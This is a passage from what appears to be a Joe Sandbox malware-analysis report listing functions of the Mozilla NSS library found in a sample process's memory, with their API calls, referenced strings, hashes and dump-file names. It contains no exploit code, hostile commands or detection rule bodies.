Opcode ID: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction ID: 357c88562ff284db1c693552382d174c8b536814adc79a165d81cff930978213
Opcode Fuzzy Hash: c609708ecc05f08e56bb69c1b70e37aefe8df33e1a02ba745add6446eb52fb33
Instruction Fuzzy Hash: 6931667175792167EF0D50D75C22BEE248A4BA530EF440039FD0FE5BC0F6859A5702E6

Function 6C660FF0 Relevance: 22.6, APIs: 15, Instructions: 92COMMON

Download Yara Rule

APIs

PR_Lock.NSS3(?), ref: 6C661000

Part of subcall function 6C619BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C541A48), ref: 6C619BB3
Part of subcall function 6C619BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C541A48), ref: 6C619BC8

PR_SetError.NSS3(FFFFE8D5,00000000), ref: 6C661016

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

PR_Unlock.NSS3(?), ref: 6C661021

Part of subcall function 6C5FDD70: TlsGetValue.KERNEL32 ref: 6C5FDD8C
Part of subcall function 6C5FDD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C5FDDB4

PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C661046
PR_Unlock.NSS3(?), ref: 6C66106B
PR_Lock.NSS3 ref: 6C661079
PR_Unlock.NSS3 ref: 6C661096
free.MOZGLUE(?), ref: 6C6610A7
free.MOZGLUE(?), ref: 6C6610B4
PR_DestroyCondVar.NSS3(?), ref: 6C6610BF
PR_DestroyCondVar.NSS3(?), ref: 6C6610CA
PR_DestroyCondVar.NSS3(?), ref: 6C6610D5
PR_DestroyCondVar.NSS3(?), ref: 6C6610E0
PR_DestroyLock.NSS3(?), ref: 6C6610EB
free.MOZGLUE(?), ref: 6C661105

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Destroy$Cond$LockUnlockValuefree$CriticalErrorSection$EnterLeave
String ID:
API String ID: 8544004-0
Opcode ID: fc5513b9bf4eba9d442dc31606519bfd96d2fdc60ad460fe06d7b5413fc8f90e
Instruction ID: 1f68c8bc5efa4425717f4a3b475e2b628ea5e95a98259987acbf51afd953941c
Opcode Fuzzy Hash: fc5513b9bf4eba9d442dc31606519bfd96d2fdc60ad460fe06d7b5413fc8f90e
Instruction Fuzzy Hash: 1D3156B5A00402ABDB01AF16EC81A45BB75BF41319F184134E80952F61EB72FD78EBDA

Function 6C59EDD0 Relevance: 21.2, APIs: 14, Instructions: 239memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(?), ref: 6C59EE0B

Part of subcall function 6C5B0BE0: malloc.MOZGLUE(6C5A8D2D,?,00000000,?), ref: 6C5B0BF8
Part of subcall function 6C5B0BE0: TlsGetValue.KERNEL32(6C5A8D2D,?,00000000,?), ref: 6C5B0C15

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C59EEE1

Part of subcall function 6C591D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C591D7E
Part of subcall function 6C591D50: EnterCriticalSection.KERNEL32(?), ref: 6C591D8E
Part of subcall function 6C591D50: PR_Unlock.NSS3(?), ref: 6C591DD3

TlsGetValue.KERNEL32 ref: 6C59EE51
EnterCriticalSection.KERNEL32(?), ref: 6C59EE65
PR_Unlock.NSS3(?), ref: 6C59EEA2
free.MOZGLUE(?), ref: 6C59EEBB
PR_SetError.NSS3(00000000,00000000), ref: 6C59EED0
PR_Unlock.NSS3(?), ref: 6C59EF48
free.MOZGLUE(?), ref: 6C59EF68
PR_SetError.NSS3(00000000,00000000), ref: 6C59EF7D
PK11_DoesMechanism.NSS3(?,?), ref: 6C59EFA4
free.MOZGLUE(?), ref: 6C59EFDA
PR_SetError.NSS3(FFFFE040,00000000), ref: 6C59F055
free.MOZGLUE(?), ref: 6C59F060

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
String ID:
API String ID: 2524771861-0
Opcode ID: b384875945e196bb7f580ca9184ce8965cbbf295b62990d3356759b645d83b59
Instruction ID: cf5ade818e8ec01d2673582dbab4ab66184c246b7585689cb81a7b383ef033c7
Opcode Fuzzy Hash: b384875945e196bb7f580ca9184ce8965cbbf295b62990d3356759b645d83b59
Instruction Fuzzy Hash: DC818EB1A00249ABDF00DFA5DC85BEE7BB9BF48318F140464E909A3711E771ED64CBA1

Function 6C564CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON

Download Yara Rule

APIs

PK11_SignatureLen.NSS3(?), ref: 6C564D80
PORT_Alloc_Util.NSS3(00000000), ref: 6C564D95
PORT_NewArena_Util.NSS3(00000800), ref: 6C564DF2
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C564E2C
PR_SetError.NSS3(FFFFE028,00000000), ref: 6C564E43
PORT_NewArena_Util.NSS3(00000800), ref: 6C564E58
SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C564E85
DER_Encode_Util.NSS3(?,?,6C6B05A4,00000000), ref: 6C564EA7
PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C564F17
DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C564F45
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C564F62
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C564F7A
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C564F89
SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C564FC8

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
String ID:
API String ID: 2843999940-0
Opcode ID: 971e9c27d57ac9159f1c794f05bd4f46564f461153be4f46e862722e8b9e31df
Instruction ID: bdcb88cd9f8bf2691c0a8d8a29c1d4075dedbf36356fd5f767aaa6917d9ccbc8
Opcode Fuzzy Hash: 971e9c27d57ac9159f1c794f05bd4f46564f461153be4f46e862722e8b9e31df
Instruction Fuzzy Hash: 3181A171908301AFE701CF66DC90B5BB7E4AB84308F148929F958DBB50E731ED05CB92

Function 6C598F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON

Download Yara Rule

APIs

SECOID_GetAlgorithmTag_Util.NSS3(6C599582), ref: 6C598F5B

Part of subcall function 6C5ABE30: SECOID_FindOID_Util.NSS3(6C56311B,00000000,?,6C56311B,?), ref: 6C5ABE44

PORT_NewArena_Util.NSS3(00000800), ref: 6C598F6A

Part of subcall function 6C5B0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C5587ED,00000800,6C54EF74,00000000), ref: 6C5B1000
Part of subcall function 6C5B0FF0: PR_NewLock.NSS3(?,00000800,6C54EF74,00000000), ref: 6C5B1016
Part of subcall function 6C5B0FF0: PL_InitArenaPool.NSS3(00000000,security,6C5587ED,00000008,?,00000800,6C54EF74,00000000), ref: 6C5B102B

SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C598FC3
PK11_GetIVLength.NSS3(-00000001), ref: 6C598FE0
SEC_ASN1DecodeItem_Util.NSS3(?,?,6C67D820,6C599576), ref: 6C598FF9
DER_GetInteger_Util.NSS3(?), ref: 6C59901D
PORT_ZAlloc_Util.NSS3(?), ref: 6C59903E
SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C599062
memcpy.VCRUNTIME140(00000024,?,?), ref: 6C5990A2
PORT_ZAlloc_Util.NSS3(?), ref: 6C5990CA
memcpy.VCRUNTIME140(00000018,?,?), ref: 6C5990F0
PR_SetError.NSS3(FFFFE006,00000000), ref: 6C59912D
free.MOZGLUE(00000000), ref: 6C599136
PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C599145

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
String ID:
API String ID: 3626836424-0
Opcode ID: 030329921a91ab7f02e71f50a3f7553ecef9f0e48b8b0f9b23b500f74246ead6
Instruction ID: 59f6380589d821be68b2beadbf950779bd79b4f455bc65eed37aac04ff4f05e5
Opcode Fuzzy Hash: 030329921a91ab7f02e71f50a3f7553ecef9f0e48b8b0f9b23b500f74246ead6
Instruction Fuzzy Hash: 2951D1B2A042409FEB00CF29DC81B9BB7E4EF84318F054969E85997741E731E945CBD2

Function 6C664960 Relevance: 21.1, APIs: 14, Instructions: 121COMMON

Download Yara Rule

APIs

malloc.MOZGLUE(00000004,?,6C668061,?,?,?,?), ref: 6C66497D
OpenSemaphoreA.KERNEL32(00100002,00000000,?), ref: 6C66499E
GetLastError.KERNEL32(?,?,6C668061,?,?,?,?), ref: 6C6649AC
PR_SetError.NSS3(FFFFE8C2,0000007B,?,?,6C668061,?,?,?,?), ref: 6C6649C2

Part of subcall function 6C5FC2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C5FC2BF

PR_SetError.NSS3(FFFFE890,00000000,?,?,6C668061,?,?,?,?), ref: 6C6649D6
CreateSemaphoreA.KERNEL32(00000000,6C668061,7FFFFFFF,?), ref: 6C664A19
GetLastError.KERNEL32(?,?,?,?,6C668061,?,?,?,?), ref: 6C664A30
PR_SetError.NSS3(FFFFE8C9,000000B7,?,?,?,?,6C668061,?,?,?,?), ref: 6C664A49
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,6C668061,?,?,?,?), ref: 6C664A52
GetLastError.KERNEL32(?,?,?,?,6C668061,?,?,?,?), ref: 6C664A5A
free.MOZGLUE(00000000,?,?,?,?,?,6C668061,?,?,?,?), ref: 6C664A6A
CreateSemaphoreA.KERNEL32(?,6C668061,7FFFFFFF,?), ref: 6C664A9A
free.MOZGLUE(?,?,?,?,?,6C668061,?,?,?,?), ref: 6C664AAE
free.MOZGLUE(?,?,?,?,?,6C668061,?,?,?,?), ref: 6C664AC2

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Error$LastSemaphorefree$Create$CloseHandleOpenValuemalloc
String ID:
API String ID: 2092618053-0
Opcode ID: a685c0983fab96ea83d1e4717523b87a34f54dea55ec1c2c5fdd2c4b6431d103
Instruction ID: cb2abe0136e839f54639b38295cd599c204c7d346dcf048e40541457f8107d03
Opcode Fuzzy Hash: a685c0983fab96ea83d1e4717523b87a34f54dea55ec1c2c5fdd2c4b6431d103
Instruction Fuzzy Hash: 7E41D970B40205BBDB00EFEADC85B9E77B4AB49359F140124F91AA3B40DB72A914C76E

Function 6C58ADC0 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 110COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_MessageSignInit), ref: 6C58ADE6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C58AE17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C58AE29

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C58AE3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C58AE78
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C58AE8A
PR_LogPrint.NSS3(?,00000000), ref: 6C58AEA0

Strings

hKey = 0x%x, xrefs: 6C58AE62, 6C58AE72
(CK_INVALID_HANDLE), xrefs: 6C58AE1F, 6C58AE80
hSession = 0x%x, xrefs: 6C58AE01, 6C58AE11
C_MessageSignInit, xrefs: 6C58ADE1
nfl, xrefs: 6C58AEB8, 6C58AEE6

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: L_strncpyzPrint$L_strcatn
String ID: hKey = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_MessageSignInit$nfl
API String ID: 332880674-4265530041
Opcode ID: 2e3eb32e69053aa01b9daad7f9f12ef5a2b4121adfd975f47afc6e0d17bcef76
Instruction ID: ac1c0c3c8367ab67574cea27fdb4d4b5ecb8d289cec46338c093127cecf968d6
Opcode Fuzzy Hash: 2e3eb32e69053aa01b9daad7f9f12ef5a2b4121adfd975f47afc6e0d17bcef76
Instruction Fuzzy Hash: F231C575602114EBDB00DF16DCC8BAA37B5AB8630DF444825E5096BB91DB349C18CBBE

Function 6C66C8A0 Relevance: 21.1, APIs: 14, Instructions: 94stringCOMMON

Download Yara Rule

APIs

calloc.MOZGLUE(00000001,00000020), ref: 6C66C8B9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C66C8DA
malloc.MOZGLUE(00000001), ref: 6C66C8E4
strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C66C8F8
PR_NewLock.NSS3 ref: 6C66C909
PR_NewCondVar.NSS3(00000000), ref: 6C66C918
PR_NewCondVar.NSS3(00000000), ref: 6C66C92A

Part of subcall function 6C540F00: PR_GetPageSize.NSS3(6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F1B
Part of subcall function 6C540F00: PR_NewLogModule.NSS3(clock,6C540936,FFFFE8AE,?,6C4D16B7,00000000,?,6C540936,00000000,?,6C4D204A), ref: 6C540F25

free.MOZGLUE(00000000), ref: 6C66C947

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Cond$LockModulePageSizecallocfreemallocstrcpystrlen
String ID:
API String ID: 2931242645-0
Opcode ID: 71d0cf231ca04925ee049caf16152b04d3fcde7dc8176307d5a5bc2d7679a2eb
Instruction ID: 2fafbf2ae9414be69e1e6de3edfb5a83fc8d7ec14907d7e52f600056a2bd2936
Opcode Fuzzy Hash: 71d0cf231ca04925ee049caf16152b04d3fcde7dc8176307d5a5bc2d7679a2eb
Instruction Fuzzy Hash: 9B2188B1A00B01BBDF107FBA9C4565B76B8AF45359F140539E85BC2F40EB32E514C79A

Function 6C582DD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_InitPIN), ref: 6C582DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C582E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C582E33

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C582E49
PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6C582E68
PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6C582E81

Strings

ulPinLen = %d, xrefs: 6C582E7C
pPin = 0x%p, xrefs: 6C582E63
(CK_INVALID_HANDLE), xrefs: 6C582E2C
hSession = 0x%x, xrefs: 6C582E0E, 6C582E1E
C_InitPIN, xrefs: 6C582DF1
nfl, xrefs: 6C582E99, 6C582EC4

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPin = 0x%p$ ulPinLen = %d$ (CK_INVALID_HANDLE)$C_InitPIN$nfl
API String ID: 1003633598-2083332575
Opcode ID: 5ab87049692ae84322aee3d16f664c3e604ba57456ab6f6b0e09d233eac71863
Instruction ID: a28d34b2b06ccf49d4d7b2294ca38bab6ea2793988932d62d23034891fee6ebc
Opcode Fuzzy Hash: 5ab87049692ae84322aee3d16f664c3e604ba57456ab6f6b0e09d233eac71863
Instruction Fuzzy Hash: 7D31F375602124ABDB10DF16DD8CB5A3BB5EB8231CF044424E909ABB51DB309C18CBBE

Function 6C586EF0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 94COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestUpdate), ref: 6C586F16
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C586F44
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C586F53

Part of subcall function 6C66D930: PL_strncpyz.NSS3(?,?,?), ref: 6C66D963

PR_LogPrint.NSS3(?,00000000), ref: 6C586F69
PR_LogPrint.NSS3( pPart = 0x%p,?), ref: 6C586F88
PR_LogPrint.NSS3( ulPartLen = %d,?), ref: 6C586FA1

Strings

C_DigestUpdate, xrefs: 6C586F11
(CK_INVALID_HANDLE), xrefs: 6C586F4C
hSession = 0x%x, xrefs: 6C586F2E, 6C586F3E
ulPartLen = %d, xrefs: 6C586F9C
pPart = 0x%p, xrefs: 6C586F83
nfl, xrefs: 6C586FB9, 6C586FE7

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pPart = 0x%p$ ulPartLen = %d$ (CK_INVALID_HANDLE)$C_DigestUpdate$nfl
API String ID: 1003633598-3643529380
Opcode ID: 117ab69a6e6bba2244ff613be057e54901146848882b9b29f129beae4ed26d7c
Instruction ID: 4f9511569e990db3d362364398442154c151753259898501517ab2fe7857fff6
Opcode Fuzzy Hash: 117ab69a6e6bba2244ff613be057e54901146848882b9b29f129beae4ed26d7c
Instruction Fuzzy Hash: 4B31D774712154EFDB00DB16DD88B5A37B1EB8231DF084425E909ABA51DF30DD58CBAE

Function 6C54AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

PR_EnterMonitor.NSS3 ref: 6C54AF47

Part of subcall function 6C619090: TlsGetValue.KERNEL32 ref: 6C6190AB
Part of subcall function 6C619090: TlsGetValue.KERNEL32 ref: 6C6190C9
Part of subcall function 6C619090: EnterCriticalSection.KERNEL32 ref: 6C6190E5
Part of subcall function 6C619090: TlsGetValue.KERNEL32 ref: 6C619116
Part of subcall function 6C619090: LeaveCriticalSection.KERNEL32 ref: 6C61913F

FreeLibrary.KERNEL32(?), ref: 6C54AF6D
free.MOZGLUE(?), ref: 6C54AFA4
free.MOZGLUE(?), ref: 6C54AFAA
PR_ExitMonitor.NSS3 ref: 6C54AFB5
PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C54AFF5
PR_ExitMonitor.NSS3 ref: 6C54B005
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C54B014
PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C54B028
PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C54B03C

Strings

Unloaded library %s, xrefs: 6C54B023
%s decr => %d, xrefs: 6C54AFF0

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272327726.000000006C6AF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272342202.000000006C6B0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272358768.000000006C6B5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c4d0000_jlO7971vUz.jbxd

Similarity

API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
String ID: %s decr => %d$Unloaded library %s
API String ID: 4015679603-2877805755
Opcode ID: 5c0e30b772b9ecc46b15ed9bf9834fbef58928217506a9658d2ccdd35b74f391
Instruction ID: cd42ed92c824eb119f7e341f08b01d34428f8f6f121fb4bb5eca58b6d5c290ea
Opcode Fuzzy Hash: 5c0e30b772b9ecc46b15ed9bf9834fbef58928217506a9658d2ccdd35b74f391
Instruction Fuzzy Hash: 8431D9B9B04511BBEB01DF65DC80A59B775EB45309F148135E80697A41F322E824CBEE

Function 6C596C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON

Download Yara Rule

APIs

strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C59781D,00000000,6C58BE2C,?,6C596B1D,?,?,?,?,00000000,00000000,6C59781D), ref: 6C596C40
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C59781D,?,6C58BE2C,?), ref: 6C596C58
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C59781D), ref: 6C596C6F
strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C596C84
PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C596C96

Part of subcall function 6C541240: TlsGetValue.KERNEL32(00000040,?,6C54116C,NSPR_LOG_MODULES), ref: 6C541267
Part of subcall function 6C541240: EnterCriticalSection.KERNEL32(?,?,?,6C54116C,NSPR_LOG_MODULES), ref: 6C54127C
Part of subcall function 6C541240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C54116C,NSPR_LOG_MODULES), ref: 6C541291
Part of subcall function 6C541240: PR_Unlock.NSS3(?,?,?,?,6C54116C,NSPR_LOG_MODULES), ref: 6C5412A0

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C596CAA

Strings

dbm, xrefs: 6C596CA4
extern:, xrefs: 6C596C7E
sql:, xrefs: 6C596C52
rdb:, xrefs: 6C596C69
dbm:, xrefs: 6C596C3A
NSS_DEFAULT_DB_TYPE, xrefs: 6C596C91

Memory Dump Source

Source File: 00000000.00000002.2272154042.000000006C4D1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4D0000, based on PE: true

Associated: 00000000.00000002.2272139997.000000006C4D0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272277975.000000006C66F000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2272310050.000000006C6AE000.00000004.00000001.01000000.00000007.sdmpDownload File
